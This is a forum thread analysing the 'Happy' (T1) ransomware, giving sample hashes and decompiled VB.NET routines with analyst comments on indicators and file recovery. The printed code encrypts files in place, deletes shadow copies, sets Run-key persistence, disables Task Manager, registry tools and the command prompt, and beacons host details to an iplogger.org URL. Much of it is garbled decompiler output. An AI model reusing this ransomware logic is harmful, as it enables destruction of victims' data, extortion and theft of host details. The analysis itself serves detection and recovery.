T1 Happy Ransomware
Sample 1:
MD5: 29cdb46d2e01f2efb9644c7695a007bb
VT: https://www.virustotal.com/#/file/3ed94 ... /detection
Sample 2:
MD5: b7afca788487347804156f052c613db5
VT: https://www.virustotal.com/#/file/b7afc ... 052c613db5
Happy Ransomware (T1)
Re: Happy Ransomware (T1)
I personally think that it is a rather cheap VB.NET/C# ransomware
Part of the code:
' EndOf: last stage as decompiled. Drops the ransom note, sends one beacon carrying host
' details, waits 15 seconds and ends the process.
' NOTE(review): raw decompiler output; it does not compile as shown. The lines between
' "Try" and the DownloadData call are residue of a single expression (see below).
Private Sub EndOf()
' Ransom note: the embedded text resource HIT_BY_RANSOMWARE is written to the user's
' desktop. The file name "HIT BY RANSOMWARE.txt" is a usable host indicator.
System.IO.File.WriteAllText(Interaction.Environ("userprofile") & "\Desktop\HIT BY RANSOMWARE.txt", T1.My.Resources.Resources.HIT_BY_RANSOMWARE)
' The next three calls pass the bare %userprofile%, %appdata% and %programdata% values as
' the file path. As shown these name directories, not files; presumably the decompiler
' dropped a concatenated file name. Confirm against the sample before relying on
' these paths as note locations.
System.IO.File.WriteAllText(Interaction.Environ("userprofile"), T1.My.Resources.Resources.HIT_BY_RANSOMWARE)
System.IO.File.WriteAllText(Interaction.Environ("appdata"), T1.My.Resources.Resources.HIT_BY_RANSOMWARE)
System.IO.File.WriteAllText(Interaction.Environ("programdata"), T1.My.Resources.Resources.HIT_BY_RANSOMWARE)
Dim webclient1 As System.Net.WebClient = New System.Net.WebClient()
Try
' Decompiler residue up to the DownloadData call: a 10-element String array is filled with
'   "Name=" <user name> "; OS=" <OS full name> "; RAM=" <total physical memory / 1073741824,
'   rounded to 2 places> "; Time=" <current time> "; Encrypted Files=" <Me.i>
' and, presumably after concatenation, assigned to the "User-Agent" request header.
webclient1.Headers
"User-Agent"
New String(9) {}
New String(9) {}(0) = "Name="
New String(9) {}(0) = "Name="(1) = T1.My.MyProject.User.Name
New String(9) {}(0) = "Name="(1) = T1.My.MyProject.User.Name(2) = "; OS="
New String(9) {}(0) = "Name="(1) = T1.My.MyProject.User.Name(2) = "; OS="(3) = T1.My.MyProject.Computer.Info.OSFullName
New String(9) {}(0) = "Name="(1) = T1.My.MyProject.User.Name(2) = "; OS="(3) = T1.My.MyProject.Computer.Info.OSFullName(4) = "; RAM="
New String(9) {}(0) = "Name="(1) = T1.My.MyProject.User.Name(2) = "; OS="(3) = T1.My.MyProject.Computer.Info.OSFullName(4) = "; RAM="(5) = Conversions.ToString(Math.Round((T1.My.MyProject.Computer.Info.TotalPhysicalMemory / 1073741824), 2))
New String(9) {}(0) = "Name="(1) = T1.My.MyProject.User.Name(2) = "; OS="(3) = T1.My.MyProject.Computer.Info.OSFullName(4) = "; RAM="(5) = Conversions.ToString(Math.Round((T1.My.MyProject.Computer.Info.TotalPhysicalMemory / 1073741824), 2))(6) = "; Time="
New String(9) {}(0) = "Name="(1) = T1.My.MyProject.User.Name(2) = "; OS="(3) = T1.My.MyProject.Computer.Info.OSFullName(4) = "; RAM="(5) = Conversions.ToString(Math.Round((T1.My.MyProject.Computer.Info.TotalPhysicalMemory / 1073741824), 2))(6) = "; Time="(7) = Conversions.ToString(DateTime.Now).Item(New String(9) {}(0) = "Name="(1) = T1.My.MyProject.User.Name(2) = "; OS="(3) = T1.My.MyProject.Computer.Info.OSFullName(4) = "; RAM="(5) = Conversions.ToString(Math.Round((T1.My.MyProject.Computer.Info.TotalPhysicalMemory / 1073741824), 2))(6) = "; Time="(7) = Conversions.ToString(DateTime.Now)(8) = "; Encrypted Files=") = New String(9) {}(0) = "Name="(1) = T1.My.MyProject.User.Name(2) = "; OS="(3) = T1.My.MyProject.Computer.Info.OSFullName(4) = "; RAM="(5) = Conversions.ToString(Math.Round((T1.My.MyProject.Computer.Info.TotalPhysicalMemory / 1073741824), 2))(6) = "; Time="(7) = Conversions.ToString(DateTime.Now)(8) = "; Encrypted Files="(9) = Me.i.ToString()
' Beacon: a single request to an IP-logging URL; the host details travel in the User-Agent
' header, not in the URL or a body. Detection note: the URL is HTTPS, so the header is only
' visible to monitoring that inspects TLS; the host name iplogger.org still appears in DNS
' and normally in the TLS handshake.
webclient1.DownloadData("https://iplogger.org/21zut")
' The Try has a Finally but no Catch: as decompiled, a failed request (e.g. host offline)
' would propagate out of EndOf after the Dispose below.
Finally
' "Is Not Nothing" is the decompiler's rendering of IsNot Nothing.
If (webclient1 Is Not Nothing) Then
webclient1.Dispose()
End If
End Try
' 15-second pause, then the process is terminated.
System.Threading.Thread.Sleep(15000)
ProjectData.EndApp()
End Sub
' Regs: recovery inhibition, persistence and tool lock-down as decompiled. Every command
' line and registry value below is a host indicator and must be reverted during cleanup.
' NOTE(review): the "New Process()..." lines are decompiler residue of one object that is
' configured and started twice; they do not compile as shown.
Private Sub Regs()
' Recoverable sequence from the residue:
'   1. wmic.exe with arguments "shadowcopy delete", hidden window (removes Volume Shadow
'      Copies; ATT&CK T1490, Inhibit System Recovery). Process-creation logging with
'      command lines catches this.
'   2. cmd.exe with "/c takeown /f " & %systemroot% & <garbled tail>, hidden window.
'      The trailing string literal is damaged in the decompilation; the exact switches
'      cannot be read from here.
'   3. Dispose of the process object.
New Process()
New Process().StartInfo.FileName = "wmic.exe"
New Process().StartInfo.FileName = "wmic.exe".StartInfo.Arguments = "shadowcopy delete"
New Process().StartInfo.FileName = "wmic.exe".StartInfo.Arguments = "shadowcopy delete".StartInfo.WindowStyle = ProcessWindowStyle.Hidden
New Process().StartInfo.FileName = "wmic.exe".StartInfo.Arguments = "shadowcopy delete".StartInfo.WindowStyle = ProcessWindowStyle.Hidden.Start()
New Process().StartInfo.FileName = "wmic.exe".StartInfo.Arguments = "shadowcopy delete".StartInfo.WindowStyle = ProcessWindowStyle.Hidden.Start().StartInfo.FileName = "cmd.exe"
New Process().StartInfo.FileName = "wmic.exe".StartInfo.Arguments = "shadowcopy delete".StartInfo.WindowStyle = ProcessWindowStyle.Hidden.Start().StartInfo.FileName = "cmd.exe".StartInfo.Arguments = "/c takeown /f " & Interaction.Environ("systemroot") & "\".""
New Process().StartInfo.FileName = "wmic.exe".StartInfo.Arguments = "shadowcopy delete".StartInfo.WindowStyle = ProcessWindowStyle.Hidden.Start().StartInfo.FileName = "cmd.exe".StartInfo.Arguments = "/c takeown /f " & Interaction.Environ("systemroot") & "\"."".StartInfo.WindowStyle = ProcessWindowStyle.Hidden
New Process().StartInfo.FileName = "wmic.exe".StartInfo.Arguments = "shadowcopy delete".StartInfo.WindowStyle = ProcessWindowStyle.Hidden.Start().StartInfo.FileName = "cmd.exe".StartInfo.Arguments = "/c takeown /f " & Interaction.Environ("systemroot") & "\"."".StartInfo.WindowStyle = ProcessWindowStyle.Hidden.Start().Dispose()
' All seven registry writes share one Try: the first one that throws skips the rest.
' The HKLM writes normally require elevation, and OpenSubKey returns Nothing for a key
' that does not exist, so on a given host only some (or none) of these values may be
' present. Check each one individually during triage.
Try
' Persistence: Run-key value named "Cortana" pointing at the running executable
' (ATT&CK T1547.001). The value name imitates a Windows component.
Microsoft.Win32.Registry.LocalMachine.OpenSubKey("SOFTWARE\Microsoft\Windows\CurrentVersion\Run", True).SetValue("Cortana", Assembly.GetExecutingAssembly().Location)
' Machine-wide policy values: Task Manager and registry editing tools disabled.
Microsoft.Win32.Registry.LocalMachine.OpenSubKey("SOFTWARE\Microsoft\Windows\CurrentVersion\policies\system", True).SetValue("DisableTaskMgr", CType(1, Integer))
Microsoft.Win32.Registry.LocalMachine.OpenSubKey("SOFTWARE\Microsoft\Windows\CurrentVersion\policies\system", True).SetValue("DisableRegistryTools", CType(1, Integer))
' Windows Script Host switched off machine-wide (Enabled = 0).
Microsoft.Win32.Registry.LocalMachine.OpenSubKey("SOFTWARE\Microsoft\Windows Script Host\Settings", True).SetValue("Enabled", CType(0, Integer))
' Per-user equivalents: registry tools disabled, command prompt disabled (DisableCMD = 1
' under a "System" subkey that is created if missing), Windows Script Host disabled.
Microsoft.Win32.Registry.CurrentUser.OpenSubKey("SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System", True).SetValue("DisableRegistryTools", CType(1, Integer))
Microsoft.Win32.Registry.CurrentUser.OpenSubKey("SOFTWARE\Policies\Microsoft\Windows", True).CreateSubKey("System").SetValue("DisableCMD", CType(1, Integer))
Microsoft.Win32.Registry.CurrentUser.OpenSubKey("SOFTWARE\Microsoft\Windows Script Host\Settings", True).SetValue("Enabled", CType(0, Integer))
' Any failure is recorded via SetProjectError and otherwise ignored.
Catch exception1 As Exception
ProjectData.SetProjectError(exception1)
End Try
End Sub
' EnCrypt: encrypts a byte array with Rijndael in ECB mode under a key derived from a
' string. Returns Nothing if anything throws.
'   input - bytes to encrypt
'   key   - key string; hashed with SHA-256 to produce the cipher key
' Analysis notes for recovery work:
'   - The key depends only on the key string. No random key generation, IV or asymmetric
'     key wrapping appears in this routine.
'   - ECB is set explicitly; padding and block size are not set here, so the
'     RijndaelManaged defaults apply.
'   - ECB encrypts equal plaintext blocks to equal ciphertext blocks, so structure in the
'     original file can remain visible in the encrypted one.
Private Function EnCrypt(ByVal input As Byte(), ByVal key As String) As Byte()
Dim rijndaelmanaged1 As System.Security.Cryptography.RijndaelManaged = New System.Security.Cryptography.RijndaelManaged()
Dim sha256cng1 As System.Security.Cryptography.SHA256Cng = New System.Security.Cryptography.SHA256Cng()
Try
' 32-byte key = SHA-256 over the ASCII bytes of the key string.
rijndaelmanaged1.Key = sha256cng1.ComputeHash(System.Text.Encoding.ASCII.GetBytes(key))
rijndaelmanaged1.Mode = System.Security.Cryptography.CipherMode.ECB
' NOTE(review): the next two lines are scrambled by the decompiler (array2 is used in
' its own initializer and an encryptor object is returned from a Byte() function).
' Presumably the original returns CreateEncryptor().TransformFinalBlock over the whole
' input; confirm against the sample.
Dim array2 As Byte() = input.TransformFinalBlock(array2, 0, array2.Length())
Return rijndaelmanaged1.CreateEncryptor()
Catch exception1 As Exception
ProjectData.SetProjectError(exception1)
End Try
' Reached only after an exception.
Return Nothing
End Function
' EncryptDirectory: encrypts every file under a directory tree in place and appends
' ".happy" to each file name.
'   path - root directory; all files in it and its subdirectories are enumerated
' Analysis notes for recovery work:
'   - The key string for each file is (Me.i + 1) as decimal text followed by the
'     hard-coded suffix "GbVjXehg", where Me.i counts files processed so far. Keys are
'     therefore a function of processing order, not of any secret generated per victim.
'     The starting value of Me.i is not visible in this excerpt.
'   - The ".happy" extension is a host indicator.
Private Sub EncryptDirectory(ByVal path As String)
' Enumeration happens once, up front, and outside the Try below; an exception raised
' here (for instance on an unreadable subdirectory) is not handled in this routine.
Dim array1 As String() = System.IO.Directory.GetFiles(path, "*", System.IO.SearchOption.AllDirectories)
Dim num1 As Integer = 0
Do While (num1 < array1.Length())
Dim str1 As String = array1(num1)
Try
' The file is read whole, encrypted, and written back over the original path, so no
' separate plaintext copy is kept by this code.
System.IO.File.WriteAllBytes(str1, Me.EnCrypt(System.IO.File.ReadAllBytes(str1), (Me.i + 1).ToString() & "GbVjXehg"))
T1.My.MyProject.Computer.FileSystem.RenameFile(str1, T1.My.MyProject.Computer.FileSystem.GetName(str1) & ".happy")
' The counter advances only after write and rename both succeed, so a file that fails
' does not consume a key number.
Me.i = (Me.i + 1)
' Errors on individual files are swallowed silently; the loop moves to the next file.
Catch exception1 As Exception
End Try
num1 = (num1 + 1)
Loop
End Sub
My forum: hackrhouse.freeforums.net
Re: Happy Ransomware (T1)
100% .NET cheap ransomware.
hackr8 wrote: ↑Tue Jan 29, 2019 3:04 pm
I personally think that it is a rather cheap VB.NET/C# ransomware
Part of the code:
' Quoted copy of the listing from the first reply, collapsed onto a few lines by the forum
' quote. It holds the same four routines as raw decompiler output:
'   EndOf            - ransom note "HIT BY RANSOMWARE.txt" and one beacon to iplogger.org
'                      with host details in the User-Agent header
'   Regs             - wmic "shadowcopy delete", takeown on %systemroot%, Run-key value
'                      "Cortana", policy values disabling Task Manager, registry tools,
'                      CMD and Windows Script Host
'   EnCrypt          - Rijndael, ECB mode, key = SHA-256 of the key string
'   EncryptDirectory - in-place encryption of every file under a path, ".happy" appended
' NOTE(review): the text does not compile as shown; the repeated "New String(9) {}" and
' "New Process()" runs are decompiler residue.
Private Sub EndOf() System.IO.File.WriteAllText(Interaction.Environ("userprofile") & "\Desktop\HIT BY RANSOMWARE.txt", T1.My.Resources.Resources.HIT_BY_RANSOMWARE) System.IO.File.WriteAllText(Interaction.Environ("userprofile"), T1.My.Resources.Resources.HIT_BY_RANSOMWARE) System.IO.File.WriteAllText(Interaction.Environ("appdata"), T1.My.Resources.Resources.HIT_BY_RANSOMWARE) System.IO.File.WriteAllText(Interaction.Environ("programdata"), T1.My.Resources.Resources.HIT_BY_RANSOMWARE) Dim webclient1 As System.Net.WebClient = New System.Net.WebClient() Try webclient1.Headers "User-Agent" New String(9) {} New String(9) {}(0) = "Name=" New String(9) {}(0) = "Name="(1) = T1.My.MyProject.User.Name New String(9) {}(0) = "Name="(1) = T1.My.MyProject.User.Name(2) = "; OS=" New String(9) {}(0) = "Name="(1) = T1.My.MyProject.User.Name(2) = "; OS="(3) = T1.My.MyProject.Computer.Info.OSFullName New String(9) {}(0) = "Name="(1) = T1.My.MyProject.User.Name(2) = "; OS="(3) = T1.My.MyProject.Computer.Info.OSFullName(4) = "; RAM=" New String(9) {}(0) = "Name="(1) = T1.My.MyProject.User.Name(2) = "; OS="(3) = T1.My.MyProject.Computer.Info.OSFullName(4) = "; RAM="(5) = Conversions.ToString(Math.Round((T1.My.MyProject.Computer.Info.TotalPhysicalMemory / 1073741824), 2)) New String(9) {}(0) = "Name="(1) = T1.My.MyProject.User.Name(2) = "; OS="(3) = T1.My.MyProject.Computer.Info.OSFullName(4) = "; RAM="(5) = Conversions.ToString(Math.Round((T1.My.MyProject.Computer.Info.TotalPhysicalMemory / 1073741824), 2))(6) = "; Time=" New String(9) {}(0) = "Name="(1) = T1.My.MyProject.User.Name(2) = "; OS="(3) = T1.My.MyProject.Computer.Info.OSFullName(4) = "; RAM="(5) = Conversions.ToString(Math.Round((T1.My.MyProject.Computer.Info.TotalPhysicalMemory / 1073741824), 2))(6) = "; Time="(7) = Conversions.ToString(DateTime.Now).Item(New String(9) {}(0) = "Name="(1) = T1.My.MyProject.User.Name(2) = "; OS="(3) = T1.My.MyProject.Computer.Info.OSFullName(4) = "; RAM="(5) = 
Conversions.ToString(Math.Round((T1.My.MyProject.Computer.Info.TotalPhysicalMemory / 1073741824), 2))(6) = "; Time="(7) = Conversions.ToString(DateTime.Now)(8) = "; Encrypted Files=") = New String(9) {}(0) = "Name="(1) = T1.My.MyProject.User.Name(2) = "; OS="(3) = T1.My.MyProject.Computer.Info.OSFullName(4) = "; RAM="(5) = Conversions.ToString(Math.Round((T1.My.MyProject.Computer.Info.TotalPhysicalMemory / 1073741824), 2))(6) = "; Time="(7) = Conversions.ToString(DateTime.Now)(8) = "; Encrypted Files="(9) = Me.i.ToString() webclient1.DownloadData("https://iplogger.org/21zut") Finally If (webclient1 Is Not Nothing) Then webclient1.Dispose() End If End Try System.Threading.Thread.Sleep(15000) ProjectData.EndApp() End Sub Private Sub Regs() New Process() New Process().StartInfo.FileName = "wmic.exe" New Process().StartInfo.FileName = "wmic.exe".StartInfo.Arguments = "shadowcopy delete" New Process().StartInfo.FileName = "wmic.exe".StartInfo.Arguments = "shadowcopy delete".StartInfo.WindowStyle = ProcessWindowStyle.Hidden New Process().StartInfo.FileName = "wmic.exe".StartInfo.Arguments = "shadowcopy delete".StartInfo.WindowStyle = ProcessWindowStyle.Hidden.Start() New Process().StartInfo.FileName = "wmic.exe".StartInfo.Arguments = "shadowcopy delete".StartInfo.WindowStyle = ProcessWindowStyle.Hidden.Start().StartInfo.FileName = "cmd.exe" New Process().StartInfo.FileName = "wmic.exe".StartInfo.Arguments = "shadowcopy delete".StartInfo.WindowStyle = ProcessWindowStyle.Hidden.Start().StartInfo.FileName = "cmd.exe".StartInfo.Arguments = "/c takeown /f " & Interaction.Environ("systemroot") & "\"."" New Process().StartInfo.FileName = "wmic.exe".StartInfo.Arguments = "shadowcopy delete".StartInfo.WindowStyle = ProcessWindowStyle.Hidden.Start().StartInfo.FileName = "cmd.exe".StartInfo.Arguments = "/c takeown /f " & Interaction.Environ("systemroot") & "\"."".StartInfo.WindowStyle = ProcessWindowStyle.Hidden New Process().StartInfo.FileName = "wmic.exe".StartInfo.Arguments = 
"shadowcopy delete".StartInfo.WindowStyle = ProcessWindowStyle.Hidden.Start().StartInfo.FileName = "cmd.exe".StartInfo.Arguments = "/c takeown /f " & Interaction.Environ("systemroot") & "\"."".StartInfo.WindowStyle = ProcessWindowStyle.Hidden.Start().Dispose() Try Microsoft.Win32.Registry.LocalMachine.OpenSubKey("SOFTWARE\Microsoft\Windows\CurrentVersion\Run", True).SetValue("Cortana", Assembly.GetExecutingAssembly().Location) Microsoft.Win32.Registry.LocalMachine.OpenSubKey("SOFTWARE\Microsoft\Windows\CurrentVersion\policies\system", True).SetValue("DisableTaskMgr", CType(1, Integer)) Microsoft.Win32.Registry.LocalMachine.OpenSubKey("SOFTWARE\Microsoft\Windows\CurrentVersion\policies\system", True).SetValue("DisableRegistryTools", CType(1, Integer)) Microsoft.Win32.Registry.LocalMachine.OpenSubKey("SOFTWARE\Microsoft\Windows Script Host\Settings", True).SetValue("Enabled", CType(0, Integer)) Microsoft.Win32.Registry.CurrentUser.OpenSubKey("SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System", True).SetValue("DisableRegistryTools", CType(1, Integer)) Microsoft.Win32.Registry.CurrentUser.OpenSubKey("SOFTWARE\Policies\Microsoft\Windows", True).CreateSubKey("System").SetValue("DisableCMD", CType(1, Integer)) Microsoft.Win32.Registry.CurrentUser.OpenSubKey("SOFTWARE\Microsoft\Windows Script Host\Settings", True).SetValue("Enabled", CType(0, Integer)) Catch exception1 As Exception ProjectData.SetProjectError(exception1) End Try End Sub Private Function EnCrypt(ByVal input As Byte(), ByVal key As String) As Byte() Dim rijndaelmanaged1 As System.Security.Cryptography.RijndaelManaged = New System.Security.Cryptography.RijndaelManaged() Dim sha256cng1 As System.Security.Cryptography.SHA256Cng = New System.Security.Cryptography.SHA256Cng() Try rijndaelmanaged1.Key = sha256cng1.ComputeHash(System.Text.Encoding.ASCII.GetBytes(key)) rijndaelmanaged1.Mode = System.Security.Cryptography.CipherMode.ECB Dim array2 As Byte() = input.TransformFinalBlock(array2, 0, 
array2.Length()) Return rijndaelmanaged1.CreateEncryptor() Catch exception1 As Exception ProjectData.SetProjectError(exception1) End Try Return Nothing End Function Private Sub EncryptDirectory(ByVal path As String) Dim array1 As String() = System.IO.Directory.GetFiles(path, "*", System.IO.SearchOption.AllDirectories) Dim num1 As Integer = 0 Do While (num1 < array1.Length()) Dim str1 As String = array1(num1) Try System.IO.File.WriteAllBytes(str1, Me.EnCrypt(System.IO.File.ReadAllBytes(str1), (Me.i + 1).ToString() & "GbVjXehg")) T1.My.MyProject.Computer.FileSystem.RenameFile(str1, T1.My.MyProject.Computer.FileSystem.GetName(str1) & ".happy") Me.i = (Me.i + 1) Catch exception1 As Exception End Try num1 = (num1 + 1) Loop End Sub